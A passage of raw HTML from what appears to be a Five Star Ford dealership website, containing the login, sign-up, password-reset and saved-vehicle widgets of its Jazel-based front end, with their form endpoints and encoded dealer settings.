hidden="" data-jzlbind-hidden="!(h('reset_password_messages.code_required'))" class="sc-hZhUor dZAGSV">Please enter verification code.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.invalid_code'))" class="sc-hZhUor dZAGSV">Verification code is not correct.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.password_required'))" class="sc-hZhUor dZAGSV">Please enter a password.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.invalid_password'))" class="sc-hZhUor dZAGSV">Password must have length greater than or equal to 6 and include uppercase, symbol and numeric characters.</div><button class="sc-kOCNXg cVDDPa">Reset Password</button></form></div></div><div class="sc-eTyWNx sc-evWYkj dUaGmK"><div>Submitting Request...</div><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div><div class="sc-eTyWNx sc-idjmjb dSnjEh"><div><div><span data-jzlbind-tap=" jzlMergeState({ signup_messages: null, loginPopupState: { page: 'login' } }) " class="sc-hDgvsY cisAUF">&lt; Back</span></div><div class="sc-jMvuUo jHXAdR">Create an account</div><form method="POST" target="_top" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/signup/" data-jzlbind-submit-success=" jzlMergeState({ cognito: event.response.data, signup_messages: null, loginPopupState: { page: 'login' } }) " data-jzlbind-submit-error=" jzlMergeState({ signup_messages: event.response.errors, loginPopupState: { page: 'sign-up' } }) " data-jzlbind-submit=" jzlMergeState({ signup_messages: null, loginPopupState: { page: 'signing-up' } }) " class="sc-cClmTo bClNws"><input type="hidden" name="cid" value="CLIENT_ID(cid)" data-jzlbind-replace="CLIENT_ID"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="hidden" name="config" value="eyJjb25maWdEZWFsZXJOYW1lIjoiRml2ZSBTdGFyIEZvcmQiLCJjb25maWdEZWFsZXJBZGRyZXNzIjoiMTIzIE1haW4gU3QuIiwiY29uZmlnRGVhbGVyQ2l0eSI6Ik5vcnRoIFJpY2hsYW5kIEhpbGxzIiwiY29uZmlnRGVhbGVyU3RhdGUiOiJUZW5uZXNzZWUiLCJjb25maWdEZWFsZXJTdGF0ZVNob3J0IjoiVFgiLCJjb25maWdEZWFsZXJaaXAiOiI3NjE4MC03ODQ0IiwiY29uZmlnRGVhbGVyUHJpbWFyeVBob25lTnVtYmVyIjoiKDgxNykgNDk4LTg4MzgiLCJjb25maWdWZHBMaW5rVGVtcGxhdGUiOiJ7e2NvbmRpdGlvbnM6dXNlZF9vcl9jZXJ0aWZpZWR9fSB7e3llYXJ9fSB7e21ha2V9fSB7e21vZGVsfX0ge3tsb2NhdGlvbl9jaXR5fX0ge3tsb2NhdGlvbl9zdGF0ZX19IiwiY29uZmlnRW5hYmxlSW5kZXBlbmRlbnRWZHAiOmZhbHNlLCJjb25maWdEZWFsZXJTcnBVcmwiOiJodHRwczovL3d3dy41c3RhcmZvcmQuY29tL2ludmVudG9yeS9hbGwtdmVoaWNsZXMvIn0="><input type="email" name="email" placeholder="Email" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.email_required'))" class="sc-hZhUor dZAGSV">Please provide an email address.</div><div hidden="" data-jzlbind-hidden="!(h('signup_messages.username_exists'))" class="sc-hZhUor dZAGSV">Email address is already taken. You may have signed up already.</div><input type="password" name="password" placeholder="Password" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.password_required'))" class="sc-hZhUor dZAGSV">Please enter a password.</div><div hidden="" data-jzlbind-hidden="!(h('signup_messages.invalid_password'))" class="sc-hZhUor dZAGSV">Password is not valid. Please make sure it is at least 8 characters long and contains at least an uppercase letter, a lowercase letter, a number, and a symbol.</div><input type="password" name="password_verify" placeholder="Verify Password" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.passwords_dont_match'))" class="sc-hZhUor dZAGSV">Passwords don't match. Please enter your passwords again.</div><input type="text" name="first_name" placeholder="First Name" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.first_name_required'))" class="sc-hZhUor dZAGSV">Please provide a first name.</div><input type="text" name="last_name" placeholder="Last Name" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.last_name_required'))" class="sc-hZhUor dZAGSV">Please provide a last name.</div><button class="sc-kOCNXg cVDDPa">Sign Up</button></form></div></div><div class="sc-eTyWNx sc-fHlXLc isxwqY"><div>Signing up...</div><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div><div class="sc-eTyWNx sc-iKpIOp eiPzFN"><div>Welcome, <span data-jzlbind-text="h('cognito.user_info.firstName')"></span></div><form method="POST" target="_top" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/logout/" data-jzlbind-submit-success=" jzlMergeState({ cognito: event.response.data, loginPopupState: { accountPage: 'account' } }) " data-jzlbind-submit=" jzlMergeState({ loginPopupState: { accountPage: 'logging-out' } }) " class="sc-cZLAbK jpYyju"><input type="hidden" name="cid" value="CLIENT_ID(cid)" data-jzlbind-replace="CLIENT_ID"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="hidden" name="config" value="eyJjb25maWdEZWFsZXJOYW1lIjoiRml2ZSBTdGFyIEZvcmQiLCJjb25maWdEZWFsZXJBZGRyZXNzIjoiMTIzIE1haW4gU3QuIiwiY29uZmlnRGVhbGVyQ2l0eSI6Ik5vcnRoIFJpY2hsYW5kIEhpbGxzIiwiY29uZmlnRGVhbGVyU3RhdGUiOiJUZW5uZXNzZWUiLCJjb25maWdEZWFsZXJTdGF0ZVNob3J0IjoiVFgiLCJjb25maWdEZWFsZXJaaXAiOiI3NjE4MC03ODQ0IiwiY29uZmlnRGVhbGVyUHJpbWFyeVBob25lTnVtYmVyIjoiKDgxNykgNDk4LTg4MzgiLCJjb25maWdWZHBMaW5rVGVtcGxhdGUiOiJ7e2NvbmRpdGlvbnM6dXNlZF9vcl9jZXJ0aWZpZWR9fSB7e3llYXJ9fSB7e21ha2V9fSB7e21vZGVsfX0ge3tsb2NhdGlvbl9jaXR5fX0ge3tsb2NhdGlvbl9zdGF0ZX19IiwiY29uZmlnRW5hYmxlSW5kZXBlbmRlbnRWZHAiOmZhbHNlLCJjb25maWdEZWFsZXJTcnBVcmwiOiJodHRwczovL3d3dy41c3RhcmZvcmQuY29tL2ludmVudG9yeS9hbGwtdmVoaWNsZXMvIn0="><button class="sc-kOCNXg cVDDPa">Log Out</button></form></div><div class="sc-eTyWNx sc-AqAhp blevrK"><div>Logging Out...</div><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div></div></div></div></div></div></div></div><div class="sc-bhlBdH jsRDRB"><div class="sc-dpiBDp ijdEqt"><div class="sc-gKLXLV eEUiqa the_siderail shop sc-gohEOc ksKrtE" data-jzlbind-class="'sc-gKLXLV eEUiqa ' + ('the_siderail ' + h('sideRailState.page'))"><div class="sc-ePAWwb fdmzHg"><div class="sc-fObBmV dEYHnQ"><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({'sideRailState': { page: 'shop' }}) " class="sc-ldcLGC kzoAAg">Shop</div><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({'sideRailState': { page: 'account' }}) " class="sc-ldcLGC kzoAAg">Account</div></div><div class="sc-hXhGGG eosNiI"></div></div><div class="sc-bvCTgw sc-gCKARq cZpyWc"><div class="sc-ijhsb jwmmcQ"><div data-jzlbind-hidden=" !( (h('cognito.notifications') || []).length > 0 ) "><div height="80" data-jzlbind-list="h('cognito.notifications')"><script type="x-tmpl-mustache"><div class="sc-bWjmDF cJXjku"><div class="sc-kvkilB eQDKhU"><a href="{{linkTarget}}" class="sc-cANqwJ kSQXnb">{{#titleLine}}<div class="sc-jGkVzM eaUGlQ">{{titleLine}}</div>{{/titleLine}}{{#line1}}<div class="sc-clWJBl jiBOTl">{{line1}}</div>{{/line1}}{{#line2}}<div class="sc-clWJBl jiBOTl">{{line2}}</div>{{/line2}}{{#actionLine}}<div class="sc-fYAFcb eOFbyi">{{actionLine}}</div>{{/actionLine}}</a>{{#dismissAction}}<div title="Dismiss" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ cognito: { notifications: (hf(&#x27;cognito.notifications&#x27;) || []) .filter(function(x) { return x.index != {{index}}; }), dismiss_notification: &quot;{{dismissAction}}&quot; } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-kAKrxA iaHKBE"><div class="material-icons undefined sc-cCVOAp hebmLA" color="#999">clear</div></div>{{/dismissAction}}</div></div></script></div></div><div data-jzlbind-hidden=" !( (h('cognito', h('shopPageState.mode') + &quot;_favorite_vins&quot;) || []).length > 0 ) "><hr><div class="sc-hSmEHG iLYHHX">Saved Vehicles</div><div data-jzlbind-list=" (h('cognito', h('shopPageState.mode') + &quot;_favorite_vins&quot;) || []) .map(function(vin) { return h('cognito.all_vehicles', vin()) }) "><script type="x-tmpl-mustache"><div class="sc-ccvjgv bIUEdz"><a href="{{url}}" class="sc-ccbnFN gunzTT"><div class="sc-fNHLbd lfbZcs">{{year}} {{make}} {{model}} {{trim}}</div><div class="sc-fNHLbd lfbZcs">Stock #{{stockNumber}} - {{formattedPrice}}</div></a><div class="sc-jMtzgO gZjVkf"><div role="button" tabindex="0" data-jzlbind-hidden=" !(h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x === &#x27;{{vin}}&#x27;; }) .length == 0 " data-jzlbind-tap=" jzlMergeState({ cognito: { favorite_vins: (h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .concat(&#x27;{{vin}}&#x27;) .join(&quot;,&quot;) } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-lhLRcH kSHzFa"><div class="material-icons undefined sc-cCVOAp loFpun" color="#666">star_border</div></div><div hidden="" role="button" tabindex="0" data-jzlbind-hidden=" !(h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x === &#x27;{{vin}}&#x27;; }) .length &gt; 0 " data-jzlbind-tap=" jzlMergeState({ cognito: { favorite_vins: (h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x !== &#x27;{{vin}}&#x27;; }) .join(&quot;,&quot;) } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-lhLRcH kSHzFa"><div class="material-icons undefined sc-cCVOAp ivnIst" color="#fef131">star</div></div></div></div></script></div></div><div data-jzlbind-hidden=" !( (h('cognito', h('shopPageState.mode') + &quot;_recent_vins&quot;) || []).length > 0 ) "><hr><div class="sc-hSmEHG iLYHHX">Viewed Vehicles</div><div data-jzlbind-list=" (h('cognito', h('shopPageState.mode') + &quot;_recent_vins&quot;) || []) .map(function(vin) { return h('cognito.all_vehicles', vin()) }) "><script type="x-tmpl-mustache"><div class="sc-ccvjgv bIUEdz"><a href="{{url}}" class="sc-ccbnFN gunzTT"><div class="sc-fNHLbd lfbZcs">{{year}} {{make}} {{model}} {{trim}}</div><div class="sc-fNHLbd lfbZcs">Stock #{{stockNumber}} - {{formattedPrice}}</div></a><div class="sc-jMtzgO gZjVkf"><div role="button" tabindex="0" data-jzlbind-hidden=" !(h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x === &#x27;{{vin}}&#x27;; }) .length == 0 " data-jzlbind-tap=" jzlMergeState({ cognito: { favorite_vins: (h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .concat(&#x27;{{vin}}&#x27;) .join(&quot;,&quot;) } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-lhLRcH kSHzFa"><div class="material-icons undefined sc-cCVOAp loFpun" color="#666">star_border</div></div><div hidden="" role="button" tabindex="0" data-jzlbind-hidden=" !(h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x === &#x27;{{vin}}&#x27;; }) .length &gt; 0 " data-jzlbind-tap=" jzlMergeState({ cognito: { favorite_vins: (h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x !== &#x27;{{vin}}&#x27;; }) .join(&quot;,&quot;) } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-lhLRcH kSHzFa"><div class="material-icons undefined sc-cCVOAp ivnIst" color="#fef131">star</div></div></div></div></script></div></div><div role="button" tabindex="0" data-jzlbind-hidden=" !( h('cognito.long_list_exists') ) " data-jzlbind-tap=" jzlMergeState({ shopPageState: { mode: h('shopPageState.mode') == &quot;short&quot; ? &quot;long&quot; : &quot;short&quot; } }) " class="sc-ePDpFu iDyXGW"><div data-jzlbind-hidden=" !(h('shopPageState.mode') == &quot;short&quot;) ">Show All</div><div hidden="" data-jzlbind-hidden=" !(h('shopPageState.mode') == &quot;long&quot;) ">Show Less</div></div></div></div><div class="sc-bvCTgw sc-fjdPjP gLrMCP"><div class="sc-ekHBYt eRautH info-popup loading sc-cLxPOX fNIlHb" data-jzlbind-class="'sc-ekHBYt eRautH ' + ('info-popup ' + (h('cognito') != null ? (h('cognito.is_logged_in') ? h('loginPopupState.accountPage') : h('loginPopupState.page')) : &quot;loading&quot;))"><div class="sc-eTyWNx sc-ccXozh ilswia"><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div><div class="sc-eTyWNx sc-bsVVwV uKeDN"><form method="POST" target="_top" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/login/" data-jzlbind-submit-success=" jzlMergeState({ login_messages: null, cognito: event.response.data, loginPopupState: { page: 'login' } }) " data-jzlbind-submit-error=" jzlMergeState({ login_messages: event.response.errors, loginPopupState: { page: 'login' } }) " data-jzlbind-submit=" jzlMergeState({ login_messages: null, loginPopupState: { page: 'logging-in' } }) " class="sc-cClmTo bClNws"><input type="hidden" name="cid" value="CLIENT_ID(cid)" data-jzlbind-replace="CLIENT_ID"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="hidden" name="config" value="eyJjb25maWdEZWFsZXJOYW1lIjoiRml2ZSBTdGFyIEZvcmQiLCJjb25maWdEZWFsZXJBZGRyZXNzIjoiMTIzIE1haW4gU3QuIiwiY29uZmlnRGVhbGVyQ2l0eSI6Ik5vcnRoIFJpY2hsYW5kIEhpbGxzIiwiY29uZmlnRGVhbGVyU3RhdGUiOiJUZW5uZXNzZWUiLCJjb25maWdEZWFsZXJTdGF0ZVNob3J0IjoiVFgiLCJjb25maWdEZWFsZXJaaXAiOiI3NjE4MC03ODQ0IiwiY29uZmlnRGVhbGVyUHJpbWFyeVBob25lTnVtYmVyIjoiKDgxNykgNDk4LTg4MzgiLCJjb25maWdWZHBMaW5rVGVtcGxhdGUiOiJ7e2NvbmRpdGlvbnM6dXNlZF9vcl9jZXJ0aWZpZWR9fSB7e3llYXJ9fSB7e21ha2V9fSB7e21vZGVsfX0ge3tsb2NhdGlvbl9jaXR5fX0ge3tsb2NhdGlvbl9zdGF0ZX19IiwiY29uZmlnRW5hYmxlSW5kZXBlbmRlbnRWZHAiOmZhbHNlLCJjb25maWdEZWFsZXJTcnBVcmwiOiJodHRwczovL3d3dy41c3RhcmZvcmQuY29tL2ludmVudG9yeS9hbGwtdmVoaWNsZXMvIn0="><input type="email" name="email" placeholder="Email" class="sc-iVOTot bFQrxy"><input type="password" name="password" placeholder="Password" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('login_messages.invalid_username_or_password'))" class="sc-hZhUor dZAGSV">The username or password provided is incorrect.</div><button class="sc-kOCNXg cVDDPa">Sign in</button></form><div class="sc-jMvuUo jHXAdR"><div data-jzlbind-tap=" jzlMergeState({ reset_password_data: null, loginPopupState: { page: 'reset-password' } }) " class="sc-fxgLge iNwmcz"><span class="sc-hDgvsY cisAUF">Forgot Password</span></div></div><div class="sc-jMvuUo jHXAdR"><div data-jzlbind-tap=" jzlMergeState({ loginPopupState: { page: 'sign-up' } }) " class="sc-fxgLge iNwmcz"><span class="sc-hDgvsY cisAUF">Create an Account</span></div></div><div class="sc-gtXRHa hsPEoE"><div class="sc-fyjYeE bYgfZs"></div><div class="sc-ixltIz fhsInK">OR</div><div class="sc-fyjYeE bYgfZs"></div></div><div class="sc-jMvuUo jHXAdR"><a href="https://userlogin.jazelc.com/auth/facebook/start-login?cid=CLIENT_ID(cid)&amp;group_id=fivestarfordnrhspeed-sherwin&amp;rocketUxCognitoEndpointBase=https://rocket-prod.jazelc.com:29620/cognito/" data-jzlbind-replace="CLIENT_ID"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt="facebook" width="240" height="43" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM" data-jzlbind-image-src="https://rocket-prod.jazelc.com:29620/amp-static/images/auth/facebook.png"></a></div><div class="sc-jMvuUo jHXAdR"><a href="https://userlogin.jazelc.com/auth/loginwithamazon/start-login?cid=CLIENT_ID(cid)&amp;group_id=fivestarfordnrhspeed-sherwin&amp;rocketUxCognitoEndpointBase=https://rocket-prod.jazelc.com:29620/cognito/" data-jzlbind-replace="CLIENT_ID"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt="loginWithAmazon" width="240" height="49" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM" data-jzlbind-image-src="https://rocket-prod.jazelc.com:29620/amp-static/images/auth/loginWithAmazon.png"></a></div><div class="sc-jMvuUo jHXAdR"><a href="https://userlogin.jazelc.com/auth/googlesignin/start-login?cid=CLIENT_ID(cid)&amp;group_id=fivestarfordnrhspeed-sherwin&amp;rocketUxCognitoEndpointBase=https://rocket-prod.jazelc.com:29620/cognito/" data-jzlbind-replace="CLIENT_ID"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt="googleSignIn" width="240" height="51" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM" data-jzlbind-image-src="https://rocket-prod.jazelc.com:29620/amp-static/images/auth/googleSignIn.png"></a></div></div><div class="sc-eTyWNx sc-kbGplQ mkuBu"><div>Logging in...</div><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div><div class="sc-eTyWNx sc-exdmVY dONquv"><div><div><span data-jzlbind-tap=" jzlMergeState({ reset_password_data: null, reset_password_messages: null, loginPopupState: { page: 'login' } }) " class="sc-hDgvsY cisAUF">&lt; Back</span></div><div class="sc-jMvuUo jHXAdR">Reset Password</div><form method="POST" target="_top" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/reset_password/" data-jzlbind-submit-success=" jzlMergeState({ reset_password_data: event.response.data, reset_password_messages: null, loginPopupState: { page: !event.response.data.email ? 'login' : 'reset-password' } }) " data-jzlbind-submit-error=" jzlMergeState({ reset_password_messages: event.response.errors, loginPopupState: { page: 'reset-password' } }) " data-jzlbind-submit=" jzlMergeState({ reset_password_messages: null, loginPopupState: { page: 'resetting-password' } }) " class="sc-cClmTo bClNws"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="email" name="email" placeholder="Email" data-jzlbind-hidden="!!(h('reset_password_data.email'))" class="sc-iVOTot bFQrxy"><input type="code" name="code" placeholder="Verification Code" data-jzlbind-hidden="!(h('reset_password_data.email'))" class="sc-iVOTot bFQrxy"><input type="password" name="password" placeholder="New Password" data-jzlbind-hidden="!(h('reset_password_data.email'))" class="sc-iVOTot bFQrxy"><input type="hidden" name="mode" data-jzlbind-value="!(h('reset_password_data.email')) ? 'request' : 'reset'"><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.email_required'))" class="sc-hZhUor dZAGSV">Please provide an email address.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.user_not_exist'))" class="sc-hZhUor dZAGSV">User does not exist.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.code_required'))" class="sc-hZhUor dZAGSV">Please enter verification code.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.invalid_code'))" class="sc-hZhUor dZAGSV">Verification code is not correct.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.password_required'))" class="sc-hZhUor dZAGSV">Please enter a password.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.invalid_password'))" class="sc-hZhUor dZAGSV">Password must have length greater than or equal to 6 and include uppercase, symbol and numeric characters.</div><button class="sc-kOCNXg cVDDPa">Reset Password</button></form></div></div><div class="sc-eTyWNx sc-evWYkj dUaGmK"><div>Submitting Request...</div><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div><div class="sc-eTyWNx sc-idjmjb dSnjEh"><div><div><span data-jzlbind-tap=" jzlMergeState({ signup_messages: null, loginPopupState: { page: 'login' } }) " class="sc-hDgvsY cisAUF">&lt; Back</span></div><div class="sc-jMvuUo jHXAdR">Create an account</div><form method="POST" target="_top" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/signup/" data-jzlbind-submit-success=" jzlMergeState({ cognito: event.response.data, signup_messages: null, loginPopupState: { page: 'login' } }) " data-jzlbind-submit-error=" jzlMergeState({ signup_messages: event.response.errors, loginPopupState: { page: 'sign-up' } }) " data-jzlbind-submit=" jzlMergeState({ signup_messages: null, loginPopupState: { page: 'signing-up' } }) " class="sc-cClmTo bClNws"><input type="hidden" name="cid" value="CLIENT_ID(cid)" data-jzlbind-replace="CLIENT_ID"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="hidden" name="config" value="eyJjb25maWdEZWFsZXJOYW1lIjoiRml2ZSBTdGFyIEZvcmQiLCJjb25maWdEZWFsZXJBZGRyZXNzIjoiMTIzIE1haW4gU3QuIiwiY29uZmlnRGVhbGVyQ2l0eSI6Ik5vcnRoIFJpY2hsYW5kIEhpbGxzIiwiY29uZmlnRGVhbGVyU3RhdGUiOiJUZW5uZXNzZWUiLCJjb25maWdEZWFsZXJTdGF0ZVNob3J0IjoiVFgiLCJjb25maWdEZWFsZXJaaXAiOiI3NjE4MC03ODQ0IiwiY29uZmlnRGVhbGVyUHJpbWFyeVBob25lTnVtYmVyIjoiKDgxNykgNDk4LTg4MzgiLCJjb25maWdWZHBMaW5rVGVtcGxhdGUiOiJ7e2NvbmRpdGlvbnM6dXNlZF9vcl9jZXJ0aWZpZWR9fSB7e3llYXJ9fSB7e21ha2V9fSB7e21vZGVsfX0ge3tsb2NhdGlvbl9jaXR5fX0ge3tsb2NhdGlvbl9zdGF0ZX19IiwiY29uZmlnRW5hYmxlSW5kZXBlbmRlbnRWZHAiOmZhbHNlLCJjb25maWdEZWFsZXJTcnBVcmwiOiJodHRwczovL3d3dy41c3RhcmZvcmQuY29tL2ludmVudG9yeS9hbGwtdmVoaWNsZXMvIn0="><input type="email" name="email" placeholder="Email" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.email_required'))" class="sc-hZhUor dZAGSV">Please provide an email address.</div><div hidden="" data-jzlbind-hidden="!(h('signup_messages.username_exists'))" class="sc-hZhUor dZAGSV">Email address is already taken. You may have signed up already.</div><input type="password" name="password" placeholder="Password" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.password_required'))" class="sc-hZhUor dZAGSV">Please enter a password.</div><div hidden="" data-jzlbind-hidden="!(h('signup_messages.invalid_password'))" class="sc-hZhUor dZAGSV">Password is not valid. Please make sure it is at least 8 characters long and contains at least an uppercase letter, a lowercase letter, a number, and a symbol.</div><input type="password" name="password_verify" placeholder="Verify Password" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.passwords_dont_match'))" class="sc-hZhUor dZAGSV">Passwords don't match. Please enter your passwords again.</div><input type="text" name="first_name" placeholder="First Name" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.first_name_required'))" class="sc-hZhUor dZAGSV">Please provide a first name.</div><input type="text" name="last_name" placeholder="Last Name" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('signup_messages.last_name_required'))" class="sc-hZhUor dZAGSV">Please provide a last name.</div><button class="sc-kOCNXg cVDDPa">Sign Up</button></form></div></div><div class="sc-eTyWNx sc-fHlXLc isxwqY"><div>Signing up...</div><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div><div class="sc-eTyWNx sc-iKpIOp eiPzFN"><div>Welcome, <span data-jzlbind-text="h('cognito.user_info.firstName')"></span></div><form method="POST" target="_top" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/logout/" data-jzlbind-submit-success=" jzlMergeState({ cognito: event.response.data, loginPopupState: { accountPage: 'account' } }) " data-jzlbind-submit=" jzlMergeState({ loginPopupState: { accountPage: 'logging-out' } }) " class="sc-cZLAbK jpYyju"><input type="hidden" name="cid" value="CLIENT_ID(cid)" data-jzlbind-replace="CLIENT_ID"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="hidden" name="config" value="eyJjb25maWdEZWFsZXJOYW1lIjoiRml2ZSBTdGFyIEZvcmQiLCJjb25maWdEZWFsZXJBZGRyZXNzIjoiMTIzIE1haW4gU3QuIiwiY29uZmlnRGVhbGVyQ2l0eSI6Ik5vcnRoIFJpY2hsYW5kIEhpbGxzIiwiY29uZmlnRGVhbGVyU3RhdGUiOiJUZW5uZXNzZWUiLCJjb25maWdEZWFsZXJTdGF0ZVNob3J0IjoiVFgiLCJjb25maWdEZWFsZXJaaXAiOiI3NjE4MC03ODQ0IiwiY29uZmlnRGVhbGVyUHJpbWFyeVBob25lTnVtYmVyIjoiKDgxNykgNDk4LTg4MzgiLCJjb25maWdWZHBMaW5rVGVtcGxhdGUiOiJ7e2NvbmRpdGlvbnM6dXNlZF9vcl9jZXJ0aWZpZWR9fSB7e3llYXJ9fSB7e21ha2V9fSB7e21vZGVsfX0ge3tsb2NhdGlvbl9jaXR5fX0ge3tsb2NhdGlvbl9zdGF0ZX19IiwiY29uZmlnRW5hYmxlSW5kZXBlbmRlbnRWZHAiOmZhbHNlLCJjb25maWdEZWFsZXJTcnBVcmwiOiJodHRwczovL3d3dy41c3RhcmZvcmQuY29tL2ludmVudG9yeS9hbGwtdmVoaWNsZXMvIn0="><button class="sc-kOCNXg cVDDPa">Log Out</button></form></div><div class="sc-eTyWNx sc-AqAhp blevrK"><div>Logging Out...</div><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div></div></div></div></div></div><div id="cognito-event-node" class="sc-hENMEE dWtxyS"><form id="cognito-event-node_DataForm" target="_top" method="post" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/post-state/" data-jzlbind-submit-success="jzlMergeState({'cognito': event.response})"><input type="hidden" name="cid" data-jzlbind-replace="CLIENT_ID" value="CLIENT_ID(cid)"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="hidden" name="config" value="eyJjb25maWdEZWFsZXJOYW1lIjoiRml2ZSBTdGFyIEZvcmQiLCJjb25maWdEZWFsZXJBZGRyZXNzIjoiMTIzIE1haW4gU3QuIiwiY29uZmlnRGVhbGVyQ2l0eSI6Ik5vcnRoIFJpY2hsYW5kIEhpbGxzIiwiY29uZmlnRGVhbGVyU3RhdGUiOiJUZW5uZXNzZWUiLCJjb25maWdEZWFsZXJTdGF0ZVNob3J0IjoiVFgiLCJjb25maWdEZWFsZXJaaXAiOiI3NjE4MC03ODQ0IiwiY29uZmlnRGVhbGVyUHJpbWFyeVBob25lTnVtYmVyIjoiKDgxNykgNDk4LTg4MzgiLCJjb25maWdWZHBMaW5rVGVtcGxhdGUiOiJ7e2NvbmRpdGlvbnM6dXNlZF9vcl9jZXJ0aWZpZWR9fSB7e3llYXJ9fSB7e21ha2V9fSB7e21vZGVsfX0ge3tsb2NhdGlvbl9jaXR5fX0ge3tsb2NhdGlvbl9zdGF0ZX19IiwiY29uZmlnRW5hYmxlSW5kZXBlbmRlbnRWZHAiOmZhbHNlLCJjb25maWdEZWFsZXJTcnBVcmwiOiJodHRwczovL3d3dy41c3RhcmZvcmQuY29tL2ludmVudG9yeS9hbGwtdmVoaWNsZXMvIn0="><input type="hidden" name="searchEndpoint" value="//search-a5-jazel-tango.jazel-qa.com/api/"><input type="hidden" name="accountId" value="0"><input type="hidden" name="dealerVehicleFilterId" value="440"><input type="hidden" name="favorite_vins" data-jzlbind-value="h('cognito.favorite_vins')"><input type="hidden" name="compare_vins" data-jzlbind-value="h('cognito.compare_vins')"><input type="hidden" name="recent_vins" data-jzlbind-value="h('cognito.recent_vins')"><input type="hidden" name="dismiss_notification" data-jzlbind-value="h('cognito.dismiss_notification')"><div class="submit-button" role="button" tabindex="0" data-jzlbind-tap=" jzlBindElement('cognito-event-node_DataForm').submit() ">Submit</div></form></div><script>(function(){ function setActivePanel(id, show) { with (window.jzlBindHelpers) { var targetElement = document.querySelector('#' + id); var scrollableParts = document.querySelectorAll('.' + id + '_scrollable'); var i; if (window.bodyScrollLock != null && (targetElement != null || 